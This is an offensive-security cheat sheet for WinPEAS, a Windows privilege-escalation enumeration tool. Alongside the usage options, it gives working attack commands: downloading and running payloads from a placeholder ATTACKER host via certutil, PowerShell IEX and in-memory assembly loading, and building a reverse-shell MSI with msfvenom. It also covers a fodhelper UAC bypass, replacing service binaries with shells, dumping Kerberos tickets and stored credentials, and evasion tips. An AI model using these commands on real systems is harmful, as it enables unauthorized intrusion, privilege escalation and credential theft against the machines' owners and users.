WINPEAS
Authorized use only. Offensive reference for systems you own or are explicitly permitted to test. You are responsible for staying within the law.
WinPEAS is a script for Windows privilege escalation enumeration. Part of the PEASS-ng suite for finding misconfigurations.
DOWNLOAD#
# From GitHub releases # winPEASx64.exe (64-bit) # winPEASx86.exe (32-bit) # winPEAS.bat (batch version) # winPEAS.ps1 (PowerShell version) https://github.com/carlospolop/PEASS-ng/releases
TRANSFER TO TARGET#
CERTUTIL#
certutil -urlcache -f http://ATTACKER/winPEASx64.exe winpeas.exe
POWERSHELL#
IWR -Uri http://ATTACKER/winPEASx64.exe -OutFile winpeas.exe
(New-Object Net.WebClient).DownloadFile('http://ATTACKER/winPEASx64.exe','C:\Temp\winpeas.exe')
SMB SHARE#
copy \\ATTACKER\share\winPEASx64.exe C:\Temp\winpeas.exe
BASIC USAGE#
# Run all checks .\winpeas.exe # Quiet mode .\winpeas.exe quiet # Specific checks .\winpeas.exe systeminfo .\winpeas.exe userinfo .\winpeas.exe processinfo .\winpeas.exe servicesinfo .\winpeas.exe applicationsinfo .\winpeas.exe networkinfo .\winpeas.exe windowscreds .\winpeas.exe browserinfo .\winpeas.exe filesinfo # Output to file .\winpeas.exe > output.txt .\winpeas.exe log=output.txt
OPTIONS#
# Search types searchall Search for all things searchfast Skip some time-consuming checks cmd Search only in command line notcolor Don't use colors wait Wait before exit debug Debug mode log=FILE Log output to file
CHECK CATEGORIES#
SYSTEM INFORMATION#
.\winpeas.exe systeminfo # Checks: # - OS version and patches # - Environment variables # - Audit settings # - WEF settings # - LAPS # - Credential Guard # - Cached credentials # - UAC settings # - AV/EDR detection # - PowerShell settings
USER INFORMATION#
.\winpeas.exe userinfo # Checks: # - Current user info # - User privileges # - All users # - Groups # - Logged on users # - Password policy # - Clipboard contents # - Saved RDP connections
PROCESS INFORMATION#
.\winpeas.exe processinfo # Checks: # - Running processes # - Process permissions # - DLL hijacking opportunities # - Command lines # - Process tokens
SERVICES INFORMATION#
.\winpeas.exe servicesinfo # Checks: # - Non-standard services # - Modifiable services # - Unquoted service paths # - Service DLL hijacking # - Service permissions
APPLICATIONS INFO#
.\winpeas.exe applicationsinfo # Checks: # - Installed applications # - AutoRun applications # - Scheduled tasks # - Startup apps # - Device drivers
NETWORK INFORMATION#
.\winpeas.exe networkinfo # Checks: # - Network interfaces # - DNS cache # - Listening ports # - Firewall rules # - Network shares # - WiFi profiles
WINDOWS CREDENTIALS#
.\winpeas.exe windowscreds # Checks: # - Credential Manager # - DPAPI credentials # - Remote Desktop credentials # - Kerberos tickets # - WiFi passwords # - AppCmd credentials # - SCClient credentials # - Putty credentials # - SSH keys # - Cloud credentials
BROWSER INFORMATION#
.\winpeas.exe browserinfo # Checks: # - Chrome credentials/history # - Firefox credentials/history # - IE/Edge credentials # - Browser extensions
FILES INFORMATION#
.\winpeas.exe filesinfo # Checks: # - Interesting files # - Backup files # - Config files # - Log files # - Office recent files # - Password files # - Registry passwords
COMMON FINDINGS#
UNQUOTED SERVICE PATH#
# Vulnerable service path: # C:\Program Files\Some App\service.exe # Place malicious binary: # C:\Program.exe # C:\Program Files\Some.exe # Restart service sc stop "ServiceName" sc start "ServiceName"
SERVICE BINARY PERMISSIONS#
# Check service binary permissions icacls "C:\path\to\service.exe" # If writable, replace with malicious binary copy C:\Temp\shell.exe "C:\path\to\service.exe" sc stop "ServiceName" sc start "ServiceName"
SERVICE CONFIGURATION#
# Modifiable service # Change binary path sc config "ServiceName" binpath="C:\Temp\shell.exe" sc stop "ServiceName" sc start "ServiceName"
DLL HIJACKING#
# Missing DLL in service # Place malicious DLL in: # - Application directory # - C:\Windows\System32 (if writable) # - PATH directories
ALWAYS INSTALL ELEVATED#
# Check registry reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated # If enabled, create MSI payload msfvenom -p windows/x64/shell_reverse_tcp LHOST=IP LPORT=PORT -f msi -o shell.msi msiexec /quiet /qn /i shell.msi
SCHEDULED TASKS#
# Writable scheduled task script echo "C:\Temp\shell.exe" > "C:\path\to\task.bat" # Or overwrite task binary
AUTOLOGON CREDENTIALS#
# Check for autologon reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" # DefaultUserName # DefaultPassword
STORED CREDENTIALS#
# Credential Manager cmdkey /list runas /savecred /user:admin cmd # DPAPI # WinPEAS extracts master keys
TOKEN PRIVILEGES#
# Abusable privileges: # - SeImpersonatePrivilege -> Potato attacks # - SeAssignPrimaryTokenPrivilege -> Token impersonation # - SeBackupPrivilege -> Read any file # - SeRestorePrivilege -> Write any file # - SeTakeOwnershipPrivilege -> Own any file # - SeDebugPrivilege -> Debug processes # - SeLoadDriverPrivilege -> Load drivers
UAC BYPASS#
# Check UAC settings # If not maximum, bypass possible # Fodhelper bypass New-Item "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Force Set-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "(default)" -Value "cmd /c start C:\Temp\shell.exe" -Force New-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "DelegateExecute" -Value "" -Force Start-Process "C:\Windows\System32\fodhelper.exe"
KERBEROS TICKETS#
# WinPEAS lists tickets # Use Rubeus for abuse Rubeus.exe triage Rubeus.exe dump
POWERSHELL VERSION#
# Load script
IEX(New-Object Net.WebClient).DownloadString('http://ATTACKER/winPEAS.ps1')
# Run
Invoke-WinPEAS
# Specific checks
Invoke-WinPEAS -Command systeminfo
BATCH VERSION#
# When exe blocked .\winPEAS.bat # Less comprehensive but evades some controls
EVASION#
# Obfuscate executable name
copy winpeas.exe update.exe
# Run from memory (PowerShell)
$data = (New-Object Net.WebClient).DownloadData('http://ATTACKER/winPEAS.exe')
$assem = [System.Reflection.Assembly]::Load($data)
[winPEAS.Program]::Main("")
# Use batch version
# Use PowerShell version with AMSI bypass
INTEGRATION#
# With Metasploit upload winpeas.exe C:\\Temp\\winpeas.exe shell C:\Temp\winpeas.exe # With Evil-WinRM upload /local/winpeas.exe C:\Temp\winpeas.exe C:\Temp\winpeas.exe # With CrackMapExec nxc smb TARGET -u user -p pass -x "C:\Temp\winpeas.exe"
QUICK REFERENCE#
.\winpeas.exe # Run all checks .\winpeas.exe quiet # Minimal output .\winpeas.exe systeminfo # System info only .\winpeas.exe servicesinfo # Services only .\winpeas.exe windowscreds # Credentials only .\winpeas.exe log=out.txt # Save to file .\winpeas.exe searchfast # Quick scan